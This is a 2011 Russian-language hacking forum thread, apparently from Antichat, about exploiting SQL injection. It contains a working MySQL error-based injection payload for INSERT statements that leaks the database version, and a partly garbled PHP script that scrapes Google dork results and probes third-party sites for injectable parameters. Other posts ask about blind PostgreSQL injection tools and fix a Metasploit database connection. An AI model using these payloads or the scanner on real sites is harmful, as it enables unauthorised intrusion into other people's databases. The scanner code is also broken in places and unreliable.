 |
|
23.02.2011, 22:28
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
2Seravin
Можно пару толковых линков по эксплуатации sql inj в инсерт?
|
|
|
23.02.2011, 22:34
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
не помню, смотри в статьях, заодно пока будешь смотреть найдёшь кучу полезного для себя
|
|
|
|
23.02.2011, 22:39
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
Сообщение от Lijzer
2Seravin
Можно пару толковых линков по эксплуатации sql inj в инсерт?
Выходишь за пределы инсерта values и делаешь подзапрос, остальное рубишь комментом, самое простое.
|
|
|
|
24.02.2011, 10:42
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
Lijzer, информация к размышлению:
Код:
insert ... values (...) on duplicate key update parent_name = (select 1 from (select count(*), concat(version(), floor(rand(0) * 2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.0.771' for key 1
|
|
|
|
24.02.2011, 20:47
|
|
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
С нами:
8990166
Репутация:
14
|
|
есть ли сканеры по доркам, актуальные на данный момент?
|
|
|
|
24.02.2011, 21:40
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
вот, так сказать, в ознакомительных целях скрипт написанный за пару минут(парсинг гугла откуда то с ачата)
Код:
]*[Hh][Rr][Ee][Ff][^=]*=[ '\"\n\r\t]*([^ \"'>\r\n\t#]+)[^>]*>/",$html,$a);
for($x=0; $x 0)
//$str = substr($str, 0, $end);
if(strpos($been, str_replace('www.','',$str)) === false)
{
$been .= $str . '+';
$url = 'http://'.$str;
if (strpos($url,'?')!==false) {
$u = parse_url($url);
$s = '';
if (preg_match_all('#(.*?)&#',$u['query'],$q)) {
foreach ($q[1] as $t) $s.=$t."'&";
$s.=substr($u['query'],strrpos($u['query'],'&')+1,strlen($u['query']))."'";
}
else $s = $u['query']."'";
$page = file_get_contents($url);
$page1 = file_get_contents($u['scheme'].'://'.$u['host'].'/'.$u['path'].'?'.$s);
if ($page!==$page2) fputs($f1,$str."\n");
}
}
}
}
Sleep(45);
}
}
flose($f1);
flose($f);
?>
|
|
|
|
24.02.2011, 23:02
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Ребят поставил metasploit framework, захожу в консоль пишу
msf > db_connect db_connect msf3:55adaf65@127.0.0.1:5432
в ответ
[-] Error while running command db_connect: Failed to connect to the database: could not connect to server: Connection refused (0x0000274D/10061)
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 5432?
Что делать?
p.s. имя юзера и пасс брал /config/database.yml, проштудировал гугл ответа не нашел.
>>> разобрался, ответ нашел тут http://forums.enterprisedb.com/posts/list/1961.page
|
|
|
|
25.02.2011, 16:09
|
|
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
С нами:
9667882
Репутация:
170
|
|
есть какие-нибудь проги для упрощения Blind PostgreSQL инъекций?
|
|
|
|
25.02.2011, 17:32
|
|
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
С нами:
8990166
Репутация:
14
|
|
Сообщение от Seravin
вот, так сказать, в ознакомительных целях скрипт написанный за пару минут(парсинг гугла откуда то с ачата)
Код:
]*[Hh][Rr][Ee][Ff][^=]*=[ '\"\n\r\t]*([^ \"'>\r\n\t#]+)[^>]*>/",$html,$a);
for($x=0; $x 0)
//$str = substr($str, 0, $end);
if(strpos($been, str_replace('www.','',$str)) === false)
{
$been .= $str . '+';
$url = 'http://'.$str;
if (strpos($url,'?')!==false) {
$u = parse_url($url);
$s = '';
if (preg_match_all('#(.*?)&#',$u['query'],$q)) {
foreach ($q[1] as $t) $s.=$t."'&";
$s.=substr($u['query'],strrpos($u['query'],'&')+1,strlen($u['query']))."'";
}
else $s = $u['query']."'";
$page = file_get_contents($url);
$page1 = file_get_contents($u['scheme'].'://'.$u['host'].'/'.$u['path'].'?'.$s);
if ($page!==$page2) fputs($f1,$str."\n");
}
}
}
}
Sleep(45);
}
}
flose($f1);
flose($f);
?>
PHP Warning: fopen(dorks.txt): failed to open stream: No such file or directory in C:\Program Files\PHP\1.php on line 2
PHP Warning: feof(): supplied argument is not a valid stream resource in C:\Program Files\PHP\1.php on line 4
PHP Warning: fgets(): supplied argument is not a valid stream resource in C:\Program Files\PHP\1.php on line 5
не работает скрипт =\
|
|
|
|
25.02.2011, 17:49
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
значит пока рано тебе этот скрипт использовать
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
